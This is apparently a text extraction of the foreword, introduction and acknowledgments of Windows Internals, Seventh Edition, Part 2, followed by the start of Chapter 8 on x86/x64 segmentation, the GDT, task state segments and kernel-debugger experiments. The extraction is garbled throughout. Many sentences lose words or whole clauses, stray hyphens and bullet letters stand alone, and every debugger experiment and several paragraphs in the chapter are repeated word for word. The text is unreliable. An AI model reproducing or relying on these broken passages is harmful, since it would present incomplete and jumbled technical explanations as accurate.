one of the most commercially successful operating systems of all time. We brought in
Vista. Alex is among the best reverse engineers and operating systems experts in the
world, and he added both breadth and depth to the book, matching or exceeding our
high standards for legibility and detail. The increasing scope of the book, combined with
Windows itself growing with new capabilities and subsystems, resulted in the 6th Edition
exceeding the single-spine publishing limit we’d run up against with the 5th Edition, so
we split it into two volumes.
I had already moved to Azure when writing for the sixth edition got underway, and by
the time we were ready for the seventh edition, I no longer had time to contribute to the
book. Dave Solomon had retired, and the task of updating the book became even more
challenging when Windows went from shipping every few years with a major release and
version number to just being called Windows 10 and releasing constantly with feature
and functionality upgrades. Pavel Yosifovitch stepped in to help Alex with Part 1, but he
too became busy with other projects and couldn’t contribute to Part 2. Alex was also
busy with his startup CrowdStrike, so we were unsure if there would even be a Part 2.
xxii
Foreword
Fortunately, Andrea came to the rescue. He and Alex have updated a broad swath of
the system in Part 2, including the startup and shutdown process, Registry subsystem,
and UWP. Not just content to provide a refresh, they’ve also added three new chapters
the Windows Internals book series being the most technically deep and accurate word on
the inner workings on Windows, one of the most important software releases in history,
is secure, and I’m proud to have my name still listed on the byline.
A memorable moment in my career came when we asked David Cutler to write the
foreword for Inside Windows 2000. Dave Solomon and I had visited Microsoft a few times
to meet with the Windows engineers and had met David on a few of the trips. However,
we had no idea if he’d agree, so were thrilled when he did. It’s a bit surreal to now be
on the other side, in a similar position to his when we asked David, and I’m honored to
be given the opportunity. I hope the endorsement my foreword represents gives you
Cutler’s did for buyers of Inside Windows 2000.
Mark Russinovich
Microsoft
March 2021
Bellevue, Washington
xxiii
Introduction
W
indows Internals, Seventh Edition, Part 2 is intended for advanced computer
professionals (developers, security researchers, and system administrators) who
want to understand how the core components of the Microsoft Windows 10 (up to and
including the May 2021 Update, a.k.a. 21H1) and Windows Server (from Server 2016 up
to Server 2022) operating systems work internally, including many components that are
shared with Windows 11X and the Xbox Operating System.
With this knowledge, developers can better comprehend the rationale behind design
decisions to create more powerful, scalable, and secure software. They will also improve
their skills at debugging complex problems rooted deep in the heart of the system, all
System administrators can leverage this information as well because understand-
ing how the operating system works “under the hood” facilitates an understanding of
the expected performance behavior of the system. This makes troubleshooting system
problems much easier when things go wrong and empowers the triage of critical issues
from the mundane.
-
ing system can misbehave and be misused, causing undesirable behavior, while also un-
derstanding the mitigations and security features offered by modern Windows systems
against such scenarios. Forensic experts can learn which data structures and mechanisms
Whoever the reader might be, after reading this book, they will have a better under-
standing of how Windows works and why it behaves the way it does.
History of the book
This is the seventh edition of a book that was originally called Inside Windows NT
(Microsoft Press, 1992), written by Helen Custer (prior to the initial release of Microsoft
Windows NT 3.1). Inside Windows NT
NT and provided key insights into the architecture and design of the system. Inside
Windows NT, Second Edition (Microsoft Press, 1998) was written by David Solomon. It
updated the original book to cover Windows NT 4.0 and had a greatly increased level of
technical depth.
xxiv
Introduction
Inside Windows 2000, Third Edition (Microsoft Press, 2000) was authored by David
Solomon and Mark Russinovich. It added many new topics, such as startup and shutdown,
kernel changes in Windows 2000, such as the Windows Driver Model (WDM), Plug and
Play, power management, Windows Management Instrumentation (WMI), encryption, the
job object, and Terminal Services. Windows Internals, Fourth Edition (Microsoft Press, 2004)
was the Windows XP and Windows Server 2003 update and added more content focused
on helping IT professionals make use of their knowledge of Windows internals, such as us-
ing key tools from Windows SysInternals and analyzing crash dumps.
Windows Internals, Fifth Edition (Microsoft Press, 2009) was the update for Windows
Vista and Windows Server 2008. It saw Mark Russinovich move on to a full-time job
at Microsoft (where he is now the Azure CTO) and the addition of a new co-author,
Alex Ionescu. New content included the image loader, user-mode debugging facil-
ity, Advanced Local Procedure Call (ALPC), and Hyper-V. The next release, Windows
Internals, Sixth Edition (Microsoft Press, 2012), was fully updated to address the many
kernel changes in Windows 7 and Windows Server 2008 R2, with many new hands-on
Seventh edition changes
of allowing the authors to publish parts of the book more quickly than others (March
2012 for Part 1, and September 2012 for Part 2). At the time, however, this split was purely
based on page counts, with the same overall chapters returning in the same order as
prior editions.
brought together the Windows 8 and Windows Phone 8 kernels, and eventually incorpo-
rated the modern application environment in Windows 8.1, Windows RT, and Windows
Phone 8.1. The convergence story was complete with Windows 10, which runs on desk-
tops, laptops, cell phones, servers, Xbox One, HoloLens, and various Internet of Things
With the seventh edition (Microsoft Press, 2017), the authors did just that, joined for
insider” and overall book manager. Working alongside Alex Ionescu, who like Mark,
had moved on to his own full-time job at CrowdStrike (where is now the VP of endpoint
Introduction
xxv
engineering), Pavel made the decision to refactor the book’s chapters so that the two
parts could be more meaningfully cohesive manuscripts instead of forcing readers to
wait for Part 2 to understand concepts introduced in Part 1. This allowed Part 1 to stand
fully on its own, introducing readers to the key concepts of Windows 10’s system archi-
tecture, process management, thread scheduling, memory management, I/O handling,
plus user, data, and platform security. Part 1 covered aspects of Windows 10 up to and
including Version 1703, the May 2017 Update, as well as Windows Server 2016.
Changes in Part 2
With Alex Ionescu and Mark Russinovich consumed by their full-time jobs, and Pavel
champion. The authors are grateful to Andrea Allievi for having eventually stepped up
to carry on the mantle and complete the series. Working with advice and guidance from
book around and brought his own vision to the series.
Realizing that chapters on topics such as networking and crash dump analysis were
beyond today’s readers’ interests, Andrea instead added exciting new content around
Hyper-V, which is now a key part of the Windows platform strategy, both on Azure and
on client systems. This complements fully rewritten chapters on the boot process, on
new storage technologies such as ReFS and DAX, and expansive updates on both system
and management mechanisms, alongside the usual hands-on experiments, which have
been fully updated to take advantage of new debugger technologies and tooling.
The long delay between Parts 1 and 2 made it possible to make sure the book was
fully updated to cover the latest public build of Windows 10, Version 2103 (May 2021
Update / 21H1), including Windows Server 2019 and 2022, such that readers would not be
“behind” after such a long gap long gap. As Windows 11 builds upon the foundation of
the same operating system kernel, readers will be adequately prepared for this upcom-
ing version as well.
Hands-on experiments
Even without access to the Windows source code, you can glean much about Windows
internals from the kernel debugger, tools from SysInternals, and the tools developed
aspect of the internal behavior of Windows, the steps for trying the tool yourself are
listed in special “EXPERIMENT” sections. These appear throughout the book, and we
xxvi
Introduction
encourage you to try them as you’re reading. Seeing visible proof of how Windows works
internally will make much more of an impression on you than just reading about it will.
Topics not covered
Windows is a large and complex operating system. This book doesn’t cover everything
relevant to Windows internals but instead focuses on the base system components. For
example, this book doesn’t describe COM+, the Windows distributed object-oriented pro-
gramming infrastructure, or the Microsoft .NET Framework, the foundation of managed
code applications. Because this is an “internals” book and not a user, programming, or sys-
A warning and a caveat
Because this book describes undocumented behavior of the internal architecture and
the operation of the Windows operating system (such as internal kernel structures and
functions), this content is subject to change between releases. By “subject to change,” we
don’t necessarily mean that details described in this book will change between releases,
but you can’t count on them not changing. Any software that uses these undocumented
interfaces, or insider knowledge about the operating system, might not work on future
releases of Windows. Even worse, software that runs in kernel mode (such as device
drivers) and uses these undocumented interfaces might experience a system crash when
running on a newer release of Windows, resulting in potential loss of data to users of
such software.
In short, you should never use any internal Windows functionality, registry key,
behavior, API, or other undocumented detail mentioned in this book during the devel-
opment of any kind of software designed for end-user systems or for any other purpose
other than research and documentation. Always check with the Microsoft Software
Assumptions about you
The book assumes the reader is comfortable with working on Windows at a power-user
level and has a basic understanding of operating system and hardware concepts, such as
CPU registers, memory, processes, and threads. Basic understanding of functions, point-
Introduction
xxvii
Organization of this book
The book is divided into two parts (as was the sixth edition), the second of which you’re
holding in your hands.
I
Chapter 8, “System mechanisms,” provides information about the important
internal mechanisms that the operating system uses to provide key services to
device drivers and applications, such as ALPC, the Object Manager, and synchro-
nization routines. It also includes details about the hardware architecture that
Windows runs on, including trap processing, segmentation, and side channel
vulnerabilities, as well as the mitigations required to address them.
I
Chapter 9, “Virtualization technologies,” describes how the Windows OS uses the
virtualization technologies exposed by modern processors to allow users to cre-
ate and use multiple virtual machines on the same system. Virtualization is also
extensively used by Windows to provide a new level of security. Thus, the Secure
Kernel and Isolated User Mode are extensively discussed in this chapter.
I
Chapter 10, “Management, diagnostics, and tracing,” details the fundamental
-
tion, and diagnostics. In particular, the Windows registry, Windows services, WMI,
and Task Scheduling are introduced along with diagnostics services like Event
Tracing for Windows (ETW) and DTrace.
I
-
ports, with particular detail on NTFS and ReFS.
I
when the system starts and shuts down, and the operating system components
brought on by UEFI, such as Secure Boot, Measured Boot, and Secure Launch.
Conventions
The following conventions are used in this book:
I
Boldface type is used to indicate text that you type as well as interface items that
you are instructed to click or buttons that you are instructed to press.
xxviii
Introduction
I
Italic type is used to indicate new terms.
I
Code elements appear in italics or in a monospaced font, depending on context.
I
-
talized—for example, the Save As dialog box.
I
Keyboard shortcuts are indicated by a plus sign (+) separating the key names. For
example, Ctrl+Alt+Delete means that you press the Ctrl, Alt, and Delete keys at
the same time.
About the companion content
We have included companion content to enrich your learning experience. You can down-
load the companion content for this book from the following page:
MicrosoftPressStore.com/WindowsInternals7ePart2/downloads
Acknowledgments
The book contains complex technical details, as well as their reasoning, which are often
hard to describe and understand from an outsider’s perspective. Throughout its history,
to provide access to the vast swath of knowledge that exists within the company and
the rich development history behind the Windows operating system. For this Seventh
Edition, Part 2, the authors are grateful to Andrea Allievi for having joined as a main
author and having helped spearhead most of the book and its updated content.
Apart from Andrea, this book wouldn’t contain the depth of technical detail or the
level of accuracy it has without the review, input, and support of key members of the
Windows development team, other experts at Microsoft, and other trusted colleagues,
friends, and experts in their own domains.
It is worth noting that the newly written Chapter 9, “Virtualization technologies”
wouldn’t have been so complete and detailed without the help of Alexander Grest and
Jon Lange, who are world-class subject experts and deserve a special thanks, in particu-
lar for the days that they spent helping Andrea understand the inner details of the most
obscure features of the hypervisor and the Secure Kernel.
Introduction
xxix
Alex would like to particularly bring special thanks to Arun Kishan, Mehmet Iyigun,
David Weston, and Andy Luhrs, who continue to be advocates for the book and Alex’s
inside access to people and information to increase the accuracy and completeness
of the book.
Furthermore, we want to thank the following people, who provided technical
review and/or input to the book or were simply a source of support and help to the
authors: Saar Amar, Craig Barkhouse, Michelle Bergeron, Joe Bialek, Kevin Broas, Omar
Carey, Neal Christiansen, Chris Fernald, Stephen Finnigan, Elia Florio, James Forshaw,
Andrew Harper, Ben Hillis, Howard Kapustein, Saruhan Karademir, Chris Kleynhans,
John Lambert, Attilio Mainetti, Bill Messmer, Matt Miller, Jake Oshins, Simon Pope,
Matthew Woolman, and Adam Zabrocki.
We continue to thank Ilfak Guilfanov of Hex-Rays (http://www.hex-rays.com) for
the IDA Pro Advanced and Hex-Rays licenses granted to Alex Ionescu, including most
recently a lifetime license, which is an invaluable tool for speeding up the reverse engi-
neering of the Windows kernel. The Hex-Rays team continues to support Alex’s research
and builds relevant new decompiler features in every release, which make writing a book
such as this possible without source code access.
Finally, the authors would like to thank the great staff at Microsoft Press (Pearson)
who have been behind turning this book into a reality. Loretta Yates, Charvi Arora, and
their support staff all deserve a special mention for their unlimited patience from turning
a contract signed in 2018 into an actual book two and a half years later.
Errata and book support
We’ve made every effort to ensure the accuracy of this book and its companion content.
You can access updates to this book—in the form of a list of submitted errata and their
related corrections at
MicrosoftPressStore.com/WindowsInternals7ePart2/errata
If you discover an error that is not already listed, please submit it to us at the
same page.
For additional book support and information, please visit
http://www.MicrosoftPressStore.com/Support.
xxx
Introduction
Please note that product support for Microsoft software and hardware is not offered
through the previous addresses. For help with Microsoft software or hardware, go to
http://support.microsoft.com.
Stay in touch
Let’s keep the conversation going! We’re on Twitter: @MicrosoftPress.
1
C H A P T E R 8
System mechanisms
T
he Windows operating system provides several base mechanisms that kernel-mode components
such as the executive, the kernel, and device drivers use. This chapter explains the following system
mechanisms and describes how they are used:
I
Processor execution model, including ring levels, segmentation, task states, trap dispatching,
including interrupts, deferred procedure calls (DPCs), asynchronous procedure calls (APCs),
timers, system worker threads, exception dispatching, and system service dispatching
I
Speculative execution barriers and other software-side channel mitigations
I
The executive Object Manager
I
Synchronization, including spinlocks, kernel dispatcher objects, wait dispatching, and user-
and slim reader-writer (SRW) locks
I
Advanced Local Procedure Call (ALPC) subsystem
I
I
WoW64
I
User-mode debugging framework
Additionally, this chapter also includes detailed information on the Universal Windows Platform
(UWP) and the set of user-mode and kernel-mode services that power it, such as the following:
I
Packaged Applications and the AppX Deployment Service
I
Centennial Applications and the Windows Desktop Bridge
I
Process State Management (PSM) and the Process Lifetime Manager (PLM)
I
Host Activity Moderator (HAM) and Background Activity Moderator (BAM)
2
CHAPTER 8 System mechanisms
Processor execution model
This section takes a deep look at the internal mechanics of Intel i386–based processor architecture and
its extension, the AMD64-based architecture used on modern systems. Although the two respective
We discuss concepts such as segmentation, tasks, and ring levels, which are critical mechanisms, and
we discuss the concept of traps, interrupts, and system calls.
Segmentation
High-level programming languages such as C/C++ and Rust are compiled down to machine-level code,
often called assembler or assembly code. In this low-level language, processor registers are accessed
directly, and there are often three primary types of registers that programs access (which are visible
when debugging code):
I
The Program Counter (PC), which in x86/x64 architecture is called the Instruction Pointer (IP)
and is represented by the EIP (x86) and RIP (x64) register. This register always points to the line
of assembly code that is executing (except for certain 32-bit ARM architectures).
I
The Stack Pointer (SP), which is represented by the ESP (x86) and RSP (x64) register. This register
points to the location in memory that is holding the current stack location.
I
Other General Purpose Registers (GPRs) include registers such as EAX/RAX, ECX/RCX, EDX/RDX,
ESI/RSI and R8, R14, just to name a few examples.
Although these registers can contain address values that point to memory, additional registers
are involved when accessing these memory locations as part of a mechanism called protected mode
segmentation. This works by checking against various segment registers, also called selectors:
I
segment (CS) register.
I
segment (SS) register.
I
Accesses to other registers are determined by a segment override, which encoding can be used
These selectors live in 16-bit segment registers and are looked up in a data structure called the
Global Descriptor Table (GDT). To locate the GDT, the processor uses yet another CPU register, the GDT
CHAPTER 8 System mechanisms
3
28-bit Offset
Table
Indicator
(TI)
Ring
Level
(0-3)
FIGURE 8-1
The offset located in the segment selector is thus looked up in the GDT, unless the TI bit is set, in
which case a different structure, the Local Descriptor Table
register instead and is not used anymore in the modern Windows OS. The result is in a segment entry
This entry, called segment descriptor in modern operating systems, serves two critical purposes:
I
ring level, also called the Code Privilege Level (CPL) at which
code running with this segment selector loaded will execute. This ring level, which can be from
Operating systems such as Windows use Ring 0 to run kernel mode components and drivers,
and Ring 3 to run applications and services.
Long Mode or
Compatibility Mode segment. The former is used to allow the native execution of x64 code,
whereas the latter activates legacy compatibility with x86. A similar mechanism exists on x86
systems, where a segment can be marked as a 16-bit segment or a 32-bit segment.
I
Descriptor Privilege Level (DPL),
-
ern systems, the processor still enforces (and applications still expect) this to be set up correctly.
base address, which will add that value
to any value already loaded in a register that is referencing this segment with an override. A correspond-
ing segment limit
I
-
at the current swap stateswapgs instruction, and load either
at the appropriate offset, which is limited to a 32-bit base address only. This is done for compat-
ibility reasons with certain operating systems, and the limit is ignored.
I
If the Code Segment is a Compatibility Mode segment, then read the base address as normal
from the appropriate GDT entry (or LDT entry if the TI bit is set). The limit is enforced and vali-
dated against the offset in the register following the segment override.
4
CHAPTER 8 System mechanisms
to achieve a sort of thread-local register
-
Therefore, segmentation is used to achieve these two effects on Windows—encode and enforce the
level of privilege that a piece of code can execute with at the processor level and provide direct access to
since the GDT is pointed to by a CPU register—the GDTR—each CPU can have its own GDT. In fact, this is
that the TEB of the currently executing thread on the current processor is equally present in its segment.
EXPERIMENT: Viewing the GDT on an x64 system
You can view the contents of the GDT, including the state of all segments and their base addresses
(when relevant) by using the dg debugger command, if you are doing remote debugging or
starting segment and the ending segment, which will be 10 and 50 in this example:
0: kd> dg 10 50
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0010 00000000`00000000 00000000`00000000 Code RE Ac 0 Nb By P Lo 0000029b
0018 00000000`00000000 00000000`00000000 Data RW Ac 0 Bg By P Nl 00000493
0020 00000000`00000000 00000000`ffffffff Code RE Ac 3 Bg Pg P Nl 00000cfb
0028 00000000`00000000 00000000`ffffffff Data RW Ac 3 Bg Pg P Nl 00000cf3
0030 00000000`00000000 00000000`00000000 Code RE Ac 3 Nb By P Lo 000002fb
0050 00000000`00000000 00000000`00003c00 Data RW Ac 3 Bg By P Nl 000004f3
The key segments here are 10h, 18h, 20h, 28h, 30h, and 50h. (This output was cleaned up a bit
to remove entries that are not relevant to this discussion.)
the number 0 under the Pl column , the letters “Lo” under the Long column, and the type being
compatibility mode), which is the segment used for executing x86 code under the WoW64 sub-
the stack, data, and extended segment.
EXPERIMENT: Viewing the GDT on an x64 system
You can view the contents of the GDT, including the state of all segments and their base addresses
(when relevant) by using the dg debugger command, if you are doing remote debugging or
starting segment and the ending segment, which will be 10 and 50 in this example:
0: kd> dg 10 50
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0010 00000000`00000000 00000000`00000000 Code RE Ac 0 Nb By P Lo 0000029b
0018 00000000`00000000 00000000`00000000 Data RW Ac 0 Bg By P Nl 00000493
0020 00000000`00000000 00000000`ffffffff Code RE Ac 3 Bg Pg P Nl 00000cfb
0028 00000000`00000000 00000000`ffffffff Data RW Ac 3 Bg Pg P Nl 00000cf3
0030 00000000`00000000 00000000`00000000 Code RE Ac 3 Nb By P Lo 000002fb
0050 00000000`00000000 00000000`00003c00 Data RW Ac 3 Bg By P Nl 000004f3
The key segments here are 10h, 18h, 20h, 28h, 30h, and 50h. (This output was cleaned up a bit
to remove entries that are not relevant to this discussion.)
the number 0 under the Pl column , the letters “Lo” under the Long column, and the type being
compatibility mode), which is the segment used for executing x86 code under the WoW64 sub-
the stack, data, and extended segment.
CHAPTER 8 System mechanisms
5
address of the TEB will be stored when running under compatibility mode, as was explained earlier.
which can be done with the following commands if you are doing local or remote kernel debug-
ging (these commands will not work with a crash dump):
lkd> rdmsr c0000101
msr[c0000101] = ffffb401`a3b80000
lkd> rdmsr c0000102
msr[c0000102] = 000000e5`6dbe9000
You can compare these values with those of @$pcr and @$teb, which should show you the
same values, as below:
lkd> dx -r0 @$pcr
@$pcr
: 0xffffb401a3b80000 [Type: _KPCR *]
lkd> dx -r0 @$teb
@$teb
: 0xe56dbe9000 [Type: _TEB *]
EXPERIMENT: Viewing the GDT on an x86 system
On an x86 system, the GDT is laid out with similar segments, but at different selectors, addition-
swapgs functionality, and due to the lack of
Long Mode, the number of selectors is a little different, as you can see here:
kd> dg 8 38
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
0008 00000000 ffffffff Code RE Ac 0 Bg Pg P Nl 00000c9b
0010 00000000 ffffffff Data RW Ac 0 Bg Pg P Nl 00000c93
0018 00000000 ffffffff Code RE 3 Bg Pg P Nl 00000cfa
0020 00000000 ffffffff Data RW Ac 3 Bg Pg P Nl 00000cf3
0030 80a9e000 00006020 Data RW Ac 0 Bg By P Nl 00000493
0038 00000000 00000fff Data RW 3 Bg By P Nl 000004f2
data, and extended segment.
-
for segmentation on these systems.
address of the TEB will be stored when running under compatibility mode, as was explained earlier.
which can be done with the following commands if you are doing local or remote kernel debug-
ging (these commands will not work with a crash dump):
lkd> rdmsr c0000101
msr[c0000101] = ffffb401`a3b80000
lkd> rdmsr c0000102
msr[c0000102] = 000000e5`6dbe9000
You can compare these values with those of @$pcr and @$teb, which should show you the
same values, as below:
lkd> dx -r0 @$pcr
@$pcr
: 0xffffb401a3b80000 [Type: _KPCR *]
lkd> dx -r0 @$teb
@$teb
: 0xe56dbe9000 [Type: _TEB *]
EXPERIMENT: Viewing the GDT on an x86 system
On an x86 system, the GDT is laid out with similar segments, but at different selectors, addition-
swapgs functionality, and due to the lack of
Long Mode, the number of selectors is a little different, as you can see here:
kd> dg 8 38
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
0008 00000000 ffffffff Code RE Ac 0 Bg Pg P Nl 00000c9b
0010 00000000 ffffffff Data RW Ac 0 Bg Pg P Nl 00000c93
0018 00000000 ffffffff Code RE 3 Bg Pg P Nl 00000cfa
0020 00000000 ffffffff Data RW Ac 3 Bg Pg P Nl 00000cf3
0030 80a9e000 00006020 Data RW Ac 0 Bg By P Nl 00000493
0038 00000000 00000fff Data RW 3 Bg By P Nl 000004f2
data, and extended segment.
-
for segmentation on these systems.
6
CHAPTER 8 System mechanisms
Lazy segment loading
Based on the description and values of the segments described earlier, it may be surprising to investi-
the following segments:
CS = 1Bh (18h | 3)
ES, DS = 23 (20h | 3)
Yet, during a system call in Ring 0, the following segments would be found:
CS = 08h (08h | 0)
ES, DS = 23 (20h | 3)
Similarly, an x64 thread executing in kernel mode would also have its ES and DS segments set to 2Bh
(28h | 3). This discrepancy is due to a feature known as lazy segment loading-
lessness of the Descriptor Privilege Level (DPL) of a data segment when the current Code Privilege Level
access data of a lower DPL—but not the contrary—setting DS and/or ES to their “proper” values upon
entering the kernel would also require restoring them when returning to user mode.
-
ing costs to system call and interrupt handling. As such, Windows always uses the Ring 3 data segment
values, avoiding these associated costs.
Task state segments
Other than the code and data segment registers, there is an additional special register on both x86 and
x64 architectures: the Task Register (TR), which is also another 16-bit selector that acts as an offset in
the GDT. In this case, however, the segment entry is not associated with code or data, but rather with
a task
is called the Task State—in the case of Windows, the current thread. These task states, represented
by segments (Task State Segment, or TSS), are used in modern x86 operating systems to construct a
section). At minimum, a TSS represents a page directory (through the CR3 register), such as a PML4 on
x64 systems (see Part 1, Chapter 5, “Memory management,” for more information on paging), a Code
Segment, a Stack Segment, an Instruction Pointer, and up to four Stack Pointers (one for each ring
level). Such TSSs are used in the following scenarios:
I
used by the processor to correctly handle interrupts and exceptions by loading the Ring 0 stack
from the TSS if the processor was currently running in Ring 3.
CHAPTER 8 System mechanisms
7
I
requires a dedicated TSS with a custom debug fault handler and kernel stack.
I
I
occurs. Similarly, this is used to load the NMI handler on a safe kernel stack.
I
the same reasons, can run on a dedicated, safe, kernel stack.
On x64 systems, the ability to have multiple TSSs was removed because the functionality had been
relegated to mostly this one need of executing trap handlers that run on a dedicated kernel stack. As
such, only a single TSS is now used (in the case of Windows, at 040h), which now has an array of eight
possible stack pointers, called the Interrupt Stack Table (IST). Each of the preceding traps is now associ-
ated with an IST Index instead of a custom TSS. In the next section, as we dump a few IDT entries, you
will see the difference between x86 and x64 systems and their handling of these traps.
EXPERIMENT: Viewing the TSSs on an x86 system
On an x86 system, we can look at the system-wide TSS at 28h by using the same dg command
utilized earlier:
kd> dg 28 28
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
0028 8116e400 000020ab TSS32 Busy 0 Nb By P Nl 0000008b
the dx or dt commands:
kd> dx (nt!_KTSS*)0x8116e400
(nt!_KTSS*)0x8116e400
: 0x8116e400 [Type: _KTSS *]
[+0x000] Backlink
: 0x0 [Type: unsigned short]
[+0x002] Reserved0
: 0x0 [Type: unsigned short]
[+0x004] Esp0
: 0x81174000 [Type: unsigned long]
[+0x008] Ss0
: 0x10 [Type: unsigned short]
Esp0 and Ss0
Windows never uses hardware-based task switching outside of the trap conditions described
earlier. As such, the only use for this particular TSS is to load the appropriate kernel stack during
a hardware interrupt.
EXPERIMENT: Viewing the TSSs on an x86 system
On an x86 system, we can look at the system-wide TSS at 28h by using the same dg command
utilized earlier:
kd> dg 28 28
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
0028 8116e400 000020ab TSS32 Busy 0 Nb By P Nl 0000008b
the dx or dt commands:
kd> dx (nt!_KTSS*)0x8116e400
(nt!_KTSS*)0x8116e400
: 0x8116e400 [Type: _KTSS *]
[+0x000] Backlink
: 0x0 [Type: unsigned short]
[+0x002] Reserved0
: 0x0 [Type: unsigned short]
[+0x004] Esp0
: 0x81174000 [Type: unsigned long]
[+0x008] Ss0
: 0x10 [Type: unsigned short]
Esp0 and Ss0
Windows never uses hardware-based task switching outside of the trap conditions described
earlier. As such, the only use for this particular TSS is to load the appropriate kernel stack during
a hardware interrupt.
8
CHAPTER 8 System mechanisms
“Meltdown” architectural processor vulnerability, this stack pointer will be the kernel stack
whereas on systems that are vulnerable, this will point to the transition stack inside of the
dg
to look at it:
kd> dg a0 a0
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
00A0 81170590 00000067 TSS32 Avl 0 Nb By P Nl 00000089
.tss command instead of dx, which will format the various
case, the input parameter is the task selector (A0h).
kd> .tss a0
eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=81e1a718 esp=820f5470 ebp=00000000 iopl=0 nv up di pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000000
hal!HalpMcaExceptionHandlerWrapper:
81e1a718 fa cli
Note how the segment registers are set up as described in the “Lazy segment loading” section
.tss
Directory. In the “Trap dispatching” section, we revisit this TSS when using the !idt command.
EXPERIMENT: Viewing the TSS and the IST on an x64 system
On an x64 system, the dg command unfortunately has a bug that does not correctly show 64-bit
segment base addresses, so obtaining the TSS segment (40h) base address requires dumping
what appear to be two segments, and combining the high, middle, and low base address bytes:
0: kd> dg 40 48
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0040 00000000`7074d000 00000000`00000067 TSS32 Busy 0 Nb By P Nl 0000008b
0048 00000000`0000ffff 00000000`0000f802 <Reserved> 0 Nb By Np Nl 00000000
“Meltdown” architectural processor vulnerability, this stack pointer will be the kernel stack
whereas on systems that are vulnerable, this will point to the transition stack inside of the
dg
to look at it:
kd> dg a0 a0
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
00A0 81170590 00000067 TSS32 Avl 0 Nb By P Nl 00000089
.tss command instead of dx, which will format the various
case, the input parameter is the task selector (A0h).
kd> .tss a0
eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=81e1a718 esp=820f5470 ebp=00000000 iopl=0 nv up di pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000000
hal!HalpMcaExceptionHandlerWrapper:
81e1a718 fa cli
Note how the segment registers are set up as described in the “Lazy segment loading” section
.tss
Directory. In the “Trap dispatching” section, we revisit this TSS when using the !idt command.
EXPERIMENT: Viewing the TSS and the IST on an x64 system
On an x64 system, the dg command unfortunately has a bug that does not correctly show 64-bit
segment base addresses, so obtaining the TSS segment (40h) base address requires dumping
what appear to be two segments, and combining the high, middle, and low base address bytes:
0: kd> dg 40 48
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0040 00000000`7074d000 00000000`00000067 TSS32 Busy 0 Nb By P Nl 0000008b
0048 00000000`0000ffff 00000000`0000f802 <Reserved> 0 Nb By Np Nl 00000000
CHAPTER 8 System mechanisms
9
0xFFFFF8027074D000. To showcase yet another
TssBase, which con-
0: kd> dx @$pcr->TssBase
@$pcr->TssBase
: 0xfffff8027074d000 [Type: _KTSS64 *]
[+0x000] Reserved0
: 0x0 [Type: unsigned long]
[+0x004] Rsp0
: 0xfffff80270757c90 [Type: unsigned __int64]
RSP0, which, similarly to x86, contains the address of the
kernel stack for the current thread (on systems without the “Meltdown” hardware vulnerability)
or the address of the transition stack in the Processor Descriptor Area.
On the system on which this experiment was done, a 10th Generation Intel processor was
used; therefore, RSP0 is the current kernel stack:
0: kd> dx @$thread->Tcb.InitialStack
@$thread->Tcb.InitialStack : 0xfffff80270757c90 [Type: void *]
-
the Interrupt Dispatch Table (IDT) references these stacks:
0: kd> dx @$pcr->TssBase->Ist
@$pcr->TssBase->Ist [Type: unsigned __int64 [8]]
[0]
: 0x0 [Type: unsigned __int64]
[1]
: 0xfffff80270768000 [Type: unsigned __int64]
[2]
: 0xfffff8027076c000 [Type: unsigned __int64]
[3]
: 0xfffff8027076a000 [Type: unsigned __int64]
[4]
: 0xfffff8027076e000 [Type: unsigned __int64]
Now that the relationship between ring level, code execution, and some of the key segments in the
segments (and their ring level) in the upcoming section on trap dispatching. Before discussing trap
the Meltdown hardware side-channels attack.
Hardware side-channel vulnerabilities
Modern CPUs can compute and move data between their internal registers very quickly (in the order
instruct the CPU to move data from the CPU registers into the main memory and vice versa. There
are different kinds of memory that are accessible from the main CPU. Memory located inside the CPU
package and accessible directly from the CPU execution engine is called cache and has the character-
istic of being fast and expensive. Memory that is accessible from the CPU through an external bus is
usually the RAM (Random Access Memory) and has the characteristic of being slower, cheaper, and big
0xFFFFF8027074D000. To showcase yet another
TssBase, which con-
0: kd> dx @$pcr->TssBase
@$pcr->TssBase
: 0xfffff8027074d000 [Type: _KTSS64 *]
[+0x000] Reserved0
: 0x0 [Type: unsigned long]
[+0x004] Rsp0
: 0xfffff80270757c90 [Type: unsigned __int64]
RSP0, which, similarly to x86, contains the address of the
kernel stack for the current thread (on systems without the “Meltdown” hardware vulnerability)
or the address of the transition stack in the Processor Descriptor Area.
On the system on which this experiment was done, a 10th Generation Intel processor was
used; therefore, RSP0 is the current kernel stack:
0: kd> dx @$thread->Tcb.InitialStack
@$thread->Tcb.InitialStack : 0xfffff80270757c90 [Type: void *]
-
the Interrupt Dispatch Table (IDT) references these stacks:
0: kd> dx @$pcr->TssBase->Ist
@$pcr->TssBase->Ist [Type: unsigned __int64 [8]]
[0]
: 0x0 [Type: unsigned __int64]
[1]
: 0xfffff80270768000 [Type: unsigned __int64]
[2]
: 0xfffff8027076c000 [Type: unsigned __int64]
[3]
: 0xfffff8027076a000 [Type: unsigned __int64]
[4]
: 0xfffff8027076e000 [Type: unsigned __int64]
10
CHAPTER 8 System mechanisms
on memories of different speeds and sizes (the more memory is closer to the CPU, the more memory is
-
ferent levels of fast cache memory, which is directly accessible by the execution engine of each physical
-
